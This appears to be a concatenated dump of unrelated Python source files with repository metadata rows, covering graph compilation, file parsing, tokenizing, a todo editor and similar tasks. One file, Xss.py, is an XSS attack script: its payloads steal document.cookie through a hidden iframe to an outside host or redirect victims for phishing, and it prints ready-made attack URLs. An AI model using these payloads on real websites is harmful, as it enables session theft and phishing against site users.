try:
self.out.write("\n".join((str(element) for element in x)))
except TypeError:
self.out.write(str(x))
self.out.write("\n")
class ListPerLineFormatter:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for lst in stream:
self.out.write("\n".join(lst))
| gpl-3.0 | -4,268,954,458,629,410,300 | 25.546875 | 86 | 0.516186 | false | 4.164216 | false | false | false |
SegFaultAX/graffiti | graffiti/core.py | 1 | 4367 | #!/usr/bin/env python
# Copyright (c) 2014 Michael-Keith Bernard
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from graffiti import util
__author__ = "Michael-Keith Bernard"
def schema(v):
if hasattr(v, "_schema"):
return v._schema
return util.fninfo(v if callable(v) else lambda: v)
def dependencies(g):
deps = {}
for k, v in g.iteritems():
deps[k] = set(v["required"])
return deps
def transitive(deps):
def deps_for(k):
if k not in deps:
return [k]
trans = set(util.concat1(deps_for(e) for e in deps[k]))
return trans | set(deps[k])
return { k: deps_for(k) for k in deps }
def topological(deps):
if not deps:
return []
sources = list(set(deps) - set(util.concat1(deps.values())))
if not sources:
raise ValueError("Graph cycle detected!")
return (sources +
topological(util.select_keys(lambda k, _: k not in sources, deps)))
def required_keys(requested, given, deps):
required = set(requested)
for r in requested:
trans = set(deps[r])
prune = set(util.concat1(deps[t] for t in trans if t in given))
required |= trans - prune
return required
def call_with(schema):
def _invoke(env, key):
fn, args = schema[key]["fn"], schema[key]["args"]
argmap = util.select_keys(lambda k, _: k in args, env)
if hasattr(fn, "_schema"):
res = fn(_env=argmap, _prune_keys=True)
else:
res = fn(**argmap)
return util.merge(env, { key: res })
return _invoke
def compile_graph(g):
if not isinstance(g, dict):
return g
else:
canonical = util.map_vals(compile_graph, g)
schematized = util.map_vals(schema, canonical)
deps = dependencies(schematized)
topo = topological(deps)[::-1]
topo_trans = { k: [e for e in topo if e in v]
for k, v in transitive(deps).iteritems() }
required = set(util.concat1(deps.values())) - set(deps)
optional = util.merge(*[v["optional"] for v in schematized.values()])
nodes = set(deps)
def _graphfn(_env=None, _keys=None, _prune_keys=False, **kwargs):
if _env is None:
_env = {}
_env = util.merge(_env, kwargs)
if required - set(_env):
raise ValueError("Unmet graph requirements!")
if _keys is None:
_keys = set(deps)
needed = nodes
else:
_keys = set(_keys)
needed = required_keys(_keys, _env, topo_trans)
strategy = [e for e in topo if e in needed and e not in _env]
result = reduce(call_with(schematized), strategy, _env)
if _prune_keys:
result = util.select_keys(lambda k, _: k in deps, result)
return result
_graphfn._schema = {
"required": required,
"optional": optional,
"args": required | set(optional),
"fn": _graphfn,
"dependencies": transitive(deps),
"direct_dependencies": deps,
"dependency_ordering": topo_trans,
"schema": schematized,
"graph": canonical,
"ordering": topo,
"nodes": nodes,
}
return _graphfn
| mit | 8,746,022,454,410,757,000 | 33.65873 | 82 | 0.601786 | false | 3.962795 | false | false | false |
iastro-pt/ObservationTools | utils/parse.py | 2 | 3461 | """Functions for parsing the parameter files."""
import os
import logging
from typing import List, Dict, Union
def parse_obslist(fname, path=None):
# type: (str, str) -> List[str]
"""Parse Obslist file containing list of dates/times.
Parameters
----------
fname: str
Filename of obs_list file.
path: str [optional]
Path to directory of filename.
Returns
--------
times: list of strings
Observation times in a list.
"""
if path is not None:
fname = os.path.join(path, fname)
if not os.path.exists(fname):
logging.warning("Obs_list file given does not exist. {}".format(fname))
obstimes = list()
with open(fname, 'r') as f:
for line in f:
if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines.
continue
else:
if "#" in line: # Remove comment from end of line
line = line.split("#")[0]
if "." in line:
line = line.split(".")[0] # remove fractions of seconds.
obstimes.append(line.strip())
logging.debug("obstimes = {}",format(obstimes))
return obstimes
def parse_paramfile(param_file, path=None):
# type: (str, str) -> Dict[str, Union[str, float]]
"""Extract orbit and stellar parameters from parameter file.
Parameters
----------
param_file: str
Filename of parameter file.
path: str [optional]
Path to directory of filename.
Returns
--------
parameters: dict
Paramemters as a {param: value} dictionary.
"""
if path is not None:
param_file = os.path.join(path, param_file)
parameters = dict() # type: Dict[str, Union[str, float]]
if not os.path.exists(param_file):
logging.warning("Parameter file given does not exist. {}".format(param_file))
with open(param_file, 'r') as f:
for line in f:
if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines.:
pass
else:
if '#' in line: # Remove comment from end of line
line = line.split("#")[0]
if line.endswith("="):
logging.warning(("Parameter missing value in {}.\nLine = {line}."
" Value set to None.").format(param_file, line))
line = line + " None" # Add None value when parameter is missing
par, val = line.lower().split('=')
par, val = par.strip(), val.strip()
if (val.startswith("[") and val.endswith("]")) or ("," in val): # Val is a list
parameters[par] = parse_list_string(val)
else:
try:
parameters[par] = float(val) # Turn parameters to floats if possible.
except ValueError:
parameters[par] = val
return parameters
def parse_list_string(string):
# type: (str) -> List[Union[str, float]]
"""Parse list of floats out of a string."""
string = string.replace("[", "").replace("]", "").strip()
list_str = string.split(",")
try:
return [float(val) for val in list_str]
except ValueError as e:
# Can't turn into floats.
return [val.strip() for val in list_str]
| mit | -9,069,334,366,275,485,000 | 34.316327 | 112 | 0.540884 | false | 4.16988 | false | false | false |
d-quinn/bio_quinn2013 | multiple_reference/phased/make_two_vcfs_from_phased.py | 1 | 3495 | import csv
import pprint
def read_hapcut_output(input_hap):
with open(input_hap) as f:
record_lines = []
for line in f:
if not line.startswith('********'):
record_lines.append(line)
else:
yield record_lines
record_lines = []
class Phased_snp:
def __init__(self, snp):
self.snp = snp
self.id = (snp[3], snp[4])
def get_phase(self):
if int(self.snp[1]) == 0 and int(self.snp[2]) == 1:
return 0
elif int(self.snp[2]) == 0 and int(self.snp[1]) == 1:
return 1
else:
raise AssertionError('Error with phasing, row:', self.snp)
def phased_snps(input_hap):
phased_dict = {}
for record in read_hapcut_output(input_hap):
snps = csv.reader(record[1:], delimiter='\t')
for snp in snps:
phased_snp = Phased_snp(snp)
phased_dict[phased_snp.id] = phased_snp
return phased_dict
def make_phased_vcfs(input_vcf, input_hap):
assert input_vcf[-4:] == '.vcf'
out_orig = input_vcf[:-4] + '__orig__.vcf'
out_new = input_vcf[:-4] + '__new__.vcf'
with open(input_vcf, newline='') as i_vcf:
fields = ('CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER',
'INFO', 'FORMAT', 'SAMPLE')
vcf_reader = csv.DictReader(i_vcf, delimiter='\t', fieldnames=fields)
with open(out_orig, 'w', newline='') as o_orig, open(out_new, 'w', newline='') as o_new:
orig_writer = csv.DictWriter(o_orig, fields, delimiter='\t', lineterminator='\n')
new_writer = csv.DictWriter(o_new, fields, delimiter='\t', lineterminator='\n')
phased_dict = phased_snps(input_hap)
phase_count = 0
for row in vcf_reader:
# print(row)
row_id = (row['CHROM'], row['POS'])
# print(row_id)
format_list = row['FORMAT'].split(':')
sample_list = row['SAMPLE'].split(':')
sample_dict = dict(zip(format_list, sample_list))
sample_dict['RD'], sample_dict['AD'] = int(sample_dict['RD']), int(sample_dict['AD'])
# If the SNP is homozygous alternate (i.e. there are only alternate reads),
# Add the SNP to both vcfs
if sample_dict['AD'] > 0 and sample_dict['RD'] == 0:
orig_writer.writerow(row)
new_writer.writerow(row)
# If the SNP is heterozygous and not phased,
# Add the SNP to the new vcf
elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and
row_id not in phased_dict):
new_writer.writerow(row)
# If the SNP is heterozygous and phased,
# Add the SNP to orig_vcf if it is phased as 0, add to new_vcf if phased as 1
elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and
row_id in phased_dict):
phase_count += 1
if phased_dict[row_id].get_phase() == 0:
orig_writer.writerow(row)
elif phased_dict[row_id].get_phase() == 1:
new_writer.writerow(row)
print('Number of SNPs from vcf that were phased:', phase_count)
make_phased_vcfs('/path/to/16_A12_pUn_down_freeze2.vcf',
'/path/to/output_haplotype_file')
| mit | 1,369,937,598,004,088,800 | 36.580645 | 101 | 0.511588 | false | 3.481076 | false | false | false |
shelari/prereform_to_contemporary | word_tokenize.py | 1 | 7361 | # -*- coding: utf-8 -*-
__author__ = 'ElenaSidorova'
import re
SYMBOLS = {
'symbols': [u'[', u']', u'-', u"'"],
'numbers': [u'0', u'1', u'2', u'3', u'4', u'5', u'6', u'7', u'8', u'9'],
'brackets': [u'[', u']']
}
class WordTokenizer(object):
@classmethod
def tokenize(cls, text):
tokens = []
for litera in text:
if not tokens:
tokens.append(litera)
continue
if litera.isalpha():
if tokens[-1][-1].isalpha():
tokens[-1] += litera
elif tokens[-1][-1] in SYMBOLS['symbols']:
tokens[-1] += litera
else:
tokens.append(litera)
continue
if litera in SYMBOLS['symbols']:
if tokens[-1][-1].isalpha():
tokens[-1] += litera
elif tokens[-1][-1] in SYMBOLS['symbols']:
if litera == u'[' and tokens[-1][-1] in SYMBOLS['brackets']:
tokens.append(litera)
continue
if litera == u']' and tokens[-1][-1] in SYMBOLS['brackets']:
tokens.append(litera)
continue
tokens[-1] += litera
else:
tokens.append(litera)
continue
if litera in SYMBOLS['numbers']:
if tokens[-1][-1] in SYMBOLS['numbers']:
tokens[-1] += litera
else:
tokens.append(litera)
continue
tokens.append(litera)
refactored = []
for token in tokens:
if u']' not in token and u'[' not in token:
refactored.append(token)
else:
new = cls.check_token(token)
if isinstance(new, unicode):
refactored.append(token)
else:
refactored += new
refactored = cls.group_brackets(refactored)
return refactored
@classmethod
def group_brackets(cls, tokens):
edited = []
pos = 0
for i, token in enumerate(tokens):
if pos >= len(tokens):
break
if tokens[pos] == u'[':
test_tokens = tokens[pos+1:]
if len(test_tokens) == 0:
edited.append(tokens[pos])
pos += 1
continue
ok_symb = 0
joined = None
arr = []
closed = 0
n = 0
for j, st in enumerate(test_tokens):
if ok_symb > 1:
break
if not st[0].isalpha() and st[0] not in SYMBOLS['symbols']:
if ok_symb > 1:
if closed and arr:
arr = arr[:-1]
if arr:
joined = 1
break
if re.search(u'^\s$', st):
if closed and arr:
joined = 1
break
else:
if not ok_symb:
ok_symb += 1
arr.append(st)
else:
if closed and arr:
joined = 1
break
elif st == u']':
if closed:
if arr:
joined = 1
break
closed = 1
arr.append(st)
elif st == u'[':
if closed and arr:
joined = 1
break
else:
arr.append(st)
n += 1
if joined and arr:
token = token + u''.join(arr)
if not pos:
edited.append(token)
if joined and arr:
pos += n
pos += 1
continue
if joined and arr:
if tokens[pos-1][-1].isalpha() or tokens[pos-1][-1] in SYMBOLS['symbols']:
edited[-1] += token
pos += n
pos += 1
continue
else:
edited.append(token)
pos += 1
else:
edited.append(tokens[pos])
pos += 1
return edited
@classmethod
def check_token(cls, token):
if u'[' in token and u']' not in token:
token = cls.split_token(token)
elif u']' in token and u'[' not in token:
token = cls.split_token(token)
elif cls.check_order_and_amount(token) is None:
token = cls.split_token(token)
return token
@classmethod
def check_order_and_amount(cls, token):
left = []
right = []
for i, litera in enumerate(token):
if litera == u'[':
left.append(i)
if litera == u']':
right.append(i)
if len(left) != len(right):
return None
for i, el in enumerate(left):
if el > right[i]:
return None
if el + 1 == right[i]:
return None
return 1
@classmethod
def split_token(cls, token):
arr = []
single = []
for i, litera in enumerate(token):
if litera in SYMBOLS['brackets']:
single.append(i)
arr.append(litera)
continue
if i-1 >= 0 and i-1 not in single:
if not arr:
arr.append(litera)
else:
arr[-1] += litera
else:
arr.append(litera)
return arr
# a = WordTokenizer()
# b = a.tokenize(u'''...те\nст... токенизатора.''')
# b = a.tokenize(u'обычно[мъ] своемъ мѣстѣ, подлѣ барометра, разставивъ ноги на приличное раз[стояніе], заложивъ руки назадъ и приводя за спиною пальцы въ движеніе тѣмъ быстрѣе, чѣмъ болѣе горячился [13] папа, спереди не выказывалъ ни малѣйшаго знака безпокойства, но, напротивъ, выраженіемъ лица выказывалъ совершенное сознаніе своей правоты и вмѣстѣ съ тѣмъ подвластности.')
# b = a.tokenize(u'«скоб[к»и]»')
# b = u"который [на] обычно[мъ] [своемъ] мѣстѣ, под[лѣ] баро[метра], разст[авивъ], любо[въ] 123 д'артань-ян"
# b = u'qwe[re]fs jk[]jk'
# b = u'«скоб[к»и]po» [скобки]'
# b = a.tokenize(b)
# print u'\n'.join(b)
# print u'\n'.join(a.get_tokens(b)) | mit | 5,302,391,894,709,455,000 | 34.350254 | 376 | 0.402556 | false | 3.76175 | false | false | false |
luis-wang/python_Tesseract_GUI_Demo | demo/mser.py | 1 | 1506 | #!/usr/bin/env python
'''
MSER detector demo
==================
mser.py [<video source>]
ESC - exit
Maximally stable extremal region extractor
forked from python2/mser.py
'''
import os,sys
sys.path.append(r'D:\workspaces\aptana3\openvc_demo\python2')
sys.path.append(r'D:\data\aptana34workspace\computer_cv\python2')
import numpy as np
import cv2
import video
def official_method():
try: video_src = sys.argv[1]
except: video_src = 0
cam = video.create_capture(video_src)
mser = cv2.MSER()
while True:
#ret, img = cam.read()
img = cv2.imread('img/eng_text.png')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
vis = img.copy()
regions = mser.detect(gray, None)
hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]
cv2.polylines(vis, hulls, 1, (0, 255, 0))
cv2.imshow('img', vis)
if 0xFF & cv2.waitKey(5) == 27:
break
cv2.destroyAllWindows()
if __name__ == '__main__':
mser = cv2.MSER()
#ret, img = cam.read()
#img = cv2.imread('img/eng_text.png')
img = cv2.imread(r'F:\Recovery\bigchi.png')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
vis = img.copy()
regions = mser.detect(gray, None)
print 'type regions : ',type(regions[0])
hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions]
cv2.polylines(vis, hulls, 1, (0, 255, 0))
cv2.imshow('img', vis)
cv2.waitKey(0)
cv2.destroyAllWindows()
| apache-2.0 | -3,223,163,544,533,769,000 | 21.147059 | 70 | 0.596946 | false | 2.794063 | false | false | false |
amiramix/serna-free | serna/i18n/check_literals.py | 5 | 7799 | ##
## Copyright(c) 2009 Syntext, Inc. All Rights Reserved.
## Contact: info@syntext.com, http://www.syntext.com
##
## This file is part of Syntext Serna XML Editor.
##
## COMMERCIAL USAGE
## Licensees holding valid Syntext Serna commercial licenses may use this file
## in accordance with the Syntext Serna Commercial License Agreement provided
## with the software, or, alternatively, in accorance with the terms contained
## in a written agreement between you and Syntext, Inc.
##
## GNU GENERAL PUBLIC LICENSE USAGE
## Alternatively, this file may be used under the terms of the GNU General
## Public License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the file LICENSE.GPL included in the packaging
## of this file. In addition, as a special exception, Syntext, Inc. gives you
## certain additional rights, which are described in the Syntext, Inc. GPL
## Exception for Syntext Serna Free Edition, included in the file
## GPL_EXCEPTION.txt in this package.
##
## You should have received a copy of appropriate licenses along with this
## package. If not, see <http://www.syntext.com/legal/>. If you are unsure
## which license is appropriate for your use, please contact the sales
## department at sales@syntext.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#!/usr/bin/python
import sys, os, re, datetime
src_re = re.compile(r"^.*\.((cxx)|(h))$", re.I)
skip_re = re.compile(r"^\s*((#\s*include\s+)|(//)).*$")
start_skip = re.compile(r"^\s*//\s*START_IGNORE_LITERALS.*$")
stop_skip = re.compile(r"^\s*//\s*STOP_IGNORE_LITERALS.*$")
complete_line_re = re.compile(r'^.*([\;\}\{])\s*$')
literal_re = re.compile(r'(?P<literal>(?<!\\)".*?(?<!\\)")+')
allowed = [
r"tr",
r"QT_TR(ANSLATE)?_NOOP",
r"NOTR",
r"get(Safe)?Property",
r"makeDescendant",
r"RT_MSG_ASSERT",
r"REGISTER_COMMAND_EVENT_MAKER",
r"GD",
r"DYNCALL\d*",
r"(Q|get)Color",
r"QRegExp",
r"translate",
r"get_translated",
r"inherits"
]
allowed_re = re.compile(r"^(" + '|'.join(allowed) + ")$")
macro_begin = re.compile(r"^(.*\W)?(?P<name>\w+)\s*\($")
def dump(lines, line):
if 0 < len(lines):
return ''.join(lines)
else:
return line
def linestrip(line):
# line = re.sub(r'"\s*"', '', line)
line = re.sub(r'\\.', '', line)
line = re.sub(r"'\"'", '', line)
return line
def eligible(line):
line = line.strip('" \t\n')
if re.match(r"^[\.\s\d]*$", line): return False
if re.match(r"^\W*$", line): return False
if re.match(r"^.$", line): return False
return True
ddbg_re = re.compile(r"^.*((IMDBG)|(DDBG)|((std::)?c(err|out)))\s*<<\s*")
dbg_re = re.compile(r"^.*DBG\s*\(.+?\)\s*<<\s*")
dbgexec_re = re.compile(r"^.*DBG_EXEC.*$")
dbgif_re = re.compile(r"^.*DBG_IF.*(\)\s*{)?.*$")
def is_debug(line):
d_obj = ddbg_re.match(line)
if d_obj:
return True
d_obj = dbg_re.match(line)
if d_obj:
return True
d_obj = dbgif_re.match(line)
if d_obj:
return True
d_obj = dbgexec_re.match(line)
if d_obj:
return True
return False
def find_allowed_wrapper(line, start, end):
if is_debug(line[:start]):
return "DBG"
lhp = line.rfind('(', 0, start)
rhp = line.find(')', end) + 1
if 0 < lhp and 0 < rhp:
m_obj = macro_begin.match(line, 0, lhp + 1)
if m_obj:
wrapper = m_obj.group("name")
if allowed_re.match(wrapper):
return wrapper
return find_allowed_wrapper(line, lhp, rhp)
return ""
def do_check(source):
lines = []
lineno = 0
dbg_flag = ''
skip_flag = 0
comment_flag = 0
mismatches = []
for line in iter(open(source)):
lineno += 1
line = line.strip(" \t")
start_comment = line.find("/*")
end_comment = line.rfind("*/")
if -1 != start_comment:
if end_comment < start_comment:
comment_flag = lineno
else:
line = line[:start_comment] + ' '*(end_comment-start_comment) + line[end_comment:]
if -1 != end_comment:
comment_flag = 0
if comment_flag: continue
if stop_skip.match(line):
if not skip_flag:
print >> sys.stderr, "STOP_IGNORE_LITERALS encountered at "\
"line %d when not skipping" % lineno
skip_flag = 0
continue
if start_skip.match(line):
if skip_flag:
print >> sys.stderr, "START_IGNORE_LITERALS encountered "\
"twice at lines %d and %d", skip_flag, lineno
skip_flag = lineno
continue
if skip_flag or skip_re.match(line): continue
line = re.sub(r"\s*//+.*$", "", line)
complete_line_obj = complete_line_re.match(line)
if not complete_line_obj:
lines.append(line)
continue
elif 0 < len(lines):
lines.append(line)
line = ""
for l in lines:
line += l.rstrip('\\\n').strip()
line = linestrip(line)
start = 0
columns = []
for m_obj in literal_re.finditer(line):
if not eligible(m_obj.group("literal")): continue
start = m_obj.start("literal")
wrapper = find_allowed_wrapper(line, start, m_obj.end("literal"))
if 0 < len(wrapper):
continue
columns.append(start)
if len(columns):
mismatches.append((lineno, columns, dump(lines, line), line))
lines = []
cnt = len(mismatches)
if cnt:
for linenum, cols, linedump, complete_line in mismatches:
columns = ','.join([ str(c) for c in cols ])
print "ERROR: Untranslated literal in %s:%d" % (source, linenum)
print " ", linedump
if 0 < skip_flag:
print >> sys.stderr, "Unmatched START_IGNORE_LITERALS in %s:%d" \
% (source, skip_flag)
return cnt
def pathgen(path):
for dp, dlist, flist in os.walk(path):
for src in [ f for f in flist if src_re.match(f) ]:
yield os.path.join(dp, src)
raise StopIteration
if len(sys.argv) < 2:
print "\nUsage: %s <src1> [<src2>..<srcN>]" % sys.argv[0]
print """\
The script checks source files for bare literals which do not appear
as arguments for a set of special macros and functions
To exclude parts of source file from checking, enclose it between
// START_IGNORE_LITERALS
line and
// STOP_IGNORE_LITERALS
line.
Currently all macro and function names that match the regular expression
%s
exclude its bare literal arguments from being reported by this script
""" % allowed_re.pattern
def check(src):
if not src_re.match(src):
return
if not os.path.exists(src):
print >> sys.stderr, "Source file '%s' does not exist" % src
sys.exit(-1)
start = datetime.datetime.now()
cnt = do_check(src)
print "\nStart checking translation of literals ..."
file_count = 0
for src in sys.argv[1:]:
if '@' == src[0]:
for srcfile in file(src[1:], "r").read().strip().split():
check(srcfile)
file_count += 1
elif os.path.isdir(src):
for path in pathgen(src):
check(path)
file_count += 1
else:
check(src)
file_count += 1
print "End checking translation of literals. ", file_count, "file(s) checked\n"
| gpl-3.0 | -4,606,029,231,923,006,000 | 30.321285 | 98 | 0.566868 | false | 3.473942 | false | false | false |
eduNEXT/edx-platform | openedx/core/djangoapps/enrollments/errors.py | 4 | 1532 | """All Error Types pertaining to Enrollment."""
class CourseEnrollmentError(Exception):
"""Generic Course Enrollment Error.
Describes any error that may occur when reading or updating enrollment information for a user or a course.
"""
def __init__(self, msg, data=None):
super().__init__(msg)
# Corresponding information to help resolve the error.
self.data = data
class UserNotFoundError(CourseEnrollmentError):
pass
class CourseEnrollmentClosedError(CourseEnrollmentError):
pass
class CourseEnrollmentFullError(CourseEnrollmentError):
pass
class CourseEnrollmentExistsError(CourseEnrollmentError): # lint-amnesty, pylint: disable=missing-class-docstring
enrollment = None
def __init__(self, message, enrollment):
super().__init__(message)
self.enrollment = enrollment
class CourseModeNotFoundError(CourseEnrollmentError):
"""The requested course mode could not be found."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class EnrollmentNotFoundError(CourseEnrollmentError):
"""The requested enrollment could not be found."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class EnrollmentApiLoadError(CourseEnrollmentError):
"""The data API could not be loaded."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class InvalidEnrollmentAttribute(CourseEnrollmentError):
"""Enrollment Attributes could not be validated"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
| agpl-3.0 | 9,033,921,829,456,944,000 | 27.90566 | 114 | 0.734334 | false | 4.545994 | false | false | false |
JordiGoPython/Python-Hack-Example | Xss.py | 1 | 1936 | from bs4 import BeautifulSoup
import urllib
import sys
import time
''' Ejemplos
http://kids.britannica.com/search?query=3
http://sonica.speedy.com.ar/resultado_busqueda.php?Tipo=1&Texto=2
--
'''
exploits = ['<script>a=document.cookie;alert(a)</script>',
'<IMG+"""><SCRIPT>alert(document.cookie)<%2FSCRIPT>']
#
PayloadCode=['var a=document.cookie;var ifr = document.createElement("iframe");ifr.src = "http://stackoverflow.com"+a;'+
'document.body.appendChild(ifr);document.getElementsByTagName("iframe")[0].setAttribute("width", "0px");',
'window.location="http://www.newlocation.com";']
Payload = ['<script>'+PayloadCode[0]+'</script>',
'<IMG+"""><SCRIPT>'+PayloadCode[0]+'<%2FSCRIPT>']
PayloadPhish = ['<script>'+PayloadCode[1]+'</script>',
'<IMG+"""><SCRIPT>'+PayloadCode[1]+'<%2FSCRIPT>']
def ConverUrl(array):
url=""
array.pop()
for x in array:
url=url+x+"="
return url
url = [x for x in sys.argv[1:]]
url=[ConverUrl(x.split("=")) for x in url]
def exploit(url):
if len(url)!=0:
ganador=False
index_pay=0
for targets in url:
for exp in exploits:
newtarget=targets + exp
print "Nuevo Target"
print newtarget
contents = urllib.urlopen(newtarget).read()
print "/////////////////////////////"
bs = BeautifulSoup(contents,"lxml")
#print bs.__dict__
#print type(bs.find_all('script'))
scripts=bs.find_all('script')
for src in scripts:
if src.text.find('alert(')==0:
print "**************"
print 'WINNER LA PAGINA WEB ES VULNERABLE XD'
print src
index_pay = exploits.index(exp)
ganador=True
break
if ganador:
tipo=raw_input("Desea hacer phishing (p) o robo de sesiones (s)")
print "**************"
time.sleep(1)
print "PAYLOAD PARA LA WEB"
if tipo=='s':
print targets+Payload[index_pay]
elif tipo=='p':
print targets+PayloadPhish[index_pay]
exploit(url)
| gpl-2.0 | 3,106,751,860,605,959,000 | 27.895522 | 120 | 0.621384 | false | 2.933333 | false | false | false |
berkayaslan/Ornek_Algoritma_Cozumu | Kod_Dunyasi_Akademik_Soru/Cozumler/BtoAsalSayi/btoasal.py | 1 | 1160 | #! /usr/env/python3
import time as t
import Bolenler
"""
Kullanicidan alinan bir sayinin basamaklari ile yazilabilecek tum
asal sayilarin adedini ekrana yazdiran fonksiyon M() olsun.
__ORNEK:__
M(127):
| 2 | 7 | 17 | 71 | 127 | 271 |
= 6
__CIKTI:__
100.000'e kadar olan sayilar icinde M() fonksiyonundan en buyuk
sayiyi donduren sayi kactir?
-----------------------------------------------------------------------
Sayi olarak bakmak yerine string olarak bakmaliyim.
***
ba = t.time()
x = Bolenler().asalSayilar(9999)
k = []
for i in x:
li = [j for j in str(i)]
li.sort()
k.append(li)
foo = 0
for foo in range(9999):
li2 = [j for j in str(foo)]
li2.sort()
temp=x.count(li2)
print(li2)
print(temp)
bi=t.time()
print(bi-ba)
***
"""
asallar = Bolenler.asalSayilar(100000)
for i in asallar
def m(sayi: int) -> None:
parcaliListe = []
if (len(str(sayi))==1)
for i in asallar:
parcalar = [j for j in str(i)]
parcalar.sort()
parcaliListe.append(parcalar)
sure1 = t.time() # Baslangic zamani
for i in range(99999):
m(i)
sure2 = t.time() # Bitis zamani
print(sure2-sure1) | gpl-3.0 | 1,046,352,658,180,883,800 | 14.077922 | 71 | 0.589655 | false | 2.33871 | false | false | false |
mruwek/topydo | topydo/lib/EditCommand.py | 1 | 5712 | # Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 Bram Schoenmakers <me@bramschoenmakers.nl>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from subprocess import call, check_call, CalledProcessError
import tempfile
from topydo.lib.ListCommand import ListCommand
from topydo.lib.MultiCommand import MultiCommand
from topydo.lib.Config import config
from topydo.lib.Todo import Todo
from topydo.lib.TodoListBase import InvalidTodoException
from topydo.lib.TodoList import TodoList
from topydo.lib.PrettyPrinterFilter import PrettyPrinterNumbers
class EditCommand(MultiCommand, ListCommand):
def __init__(self, p_args, p_todolist, p_output, p_error, p_input):
super(EditCommand, self).__init__(p_args, p_todolist, p_output,
p_error, p_input)
self.is_expression = False
self.edit_archive = False
def _process_flags(self):
opts, args = self.getopt('xed')
for opt, value in opts:
if opt == '-d':
self.edit_archive = True
elif opt == '-x':
self.show_all = True
elif opt == '-e':
self.is_expression = True
self.args = args
def _todos_to_temp(self):
f = tempfile.NamedTemporaryFile()
for todo in self.todos:
f.write("%s\n" % todo.__str__())
f.seek(0)
return f
def _todos_from_temp(self, temp_file):
temp_file.seek(0)
todos = temp_file.read().splitlines()
todo_objs = []
for todo in todos:
todo_objs.append(Todo(todo))
return todo_objs
def _open_in_editor(self, temp_file, editor):
try:
return check_call([editor, temp_file.name])
except(CalledProcessError):
self.error('Something went wrong in the editor...')
return 1
def _catch_todo_errors(self):
errors = []
if len(self.invalid_numbers) > 1 or len(self.invalid_numbers) > 0 and len(self.todos) > 0:
for number in self.invalid_numbers:
errors.append("Invalid todo number given: {}.".format(number))
elif len(self.invalid_numbers) == 1 and len(self.todos) == 0:
errors.append("Invalid todo number given.")
if len(errors) > 0:
return errors
else:
return None
def execute(self):
if not super(ListCommand, self).execute():
return False
self.printer.add_filter(PrettyPrinterNumbers(self.todolist))
try:
editor = os.environ['EDITOR'] or 'vi'
except(KeyError):
editor = 'vi'
try:
if len(self.args) < 1:
todo = config().todotxt()
return call([editor, todo]) == 0
else:
self._process_flags()
if self.edit_archive:
archive = config().archive()
return call([editor, archive]) == 0
if self.is_expression:
self.todos = self._view()._viewdata
else:
self.get_todos(self.args)
todo_errors = self._catch_todo_errors()
if not todo_errors:
temp_todos = self._todos_to_temp()
if not self._open_in_editor(temp_todos, editor):
new_todos = self._todos_from_temp(temp_todos)
if len(new_todos) == len(self.todos):
for todo in self.todos:
super(TodoList, self.todolist).delete(todo)
for todo in new_todos:
self.todolist.add_todo(todo)
self.out(self.printer.print_todo(todo))
else:
self.error('Number of edited todos is not equal to '
'number of supplied todo IDs.')
else:
self.error(self.usage())
else:
for error in todo_errors:
self.error(error)
except(OSError):
self.error('There is no such editor as: ' + editor + '. '
'Check your $EDITOR and/or $PATH')
def usage(self):
return """Synopsis:
edit
edit <NUMBER1> [<NUMBER2> ...]
edit -e [-x] [expression]
edit -d"""
def help(self):
return """\
Launches a text editor to edit todos.
Without any arguments it will just open the todo.txt file. Alternatively it can
edit todo item(s) with the given number(s) or edit relevant todos matching
the given expression. See `topydo help ls` for more information on relevant
todo items. It is also possible to open the archive file.
By default it will use $EDITOR in your environment, otherwise it will fall back
to 'vi'.
-e : Treat the subsequent arguments as an expression.
-x : Edit *all* todos matching the expression (i.e. do not filter on
dependencies or relevance).
-d : Open the archive file.
"""
| gpl-3.0 | 6,091,048,701,608,074,000 | 33.409639 | 98 | 0.57563 | false | 4.091691 | false | false | false |
hozn/stravalib | stravalib/attributes.py | 1 | 12153 | """
Attribute types used for the model.
The types system provides a mechanism for serializing/un the data to/from JSON
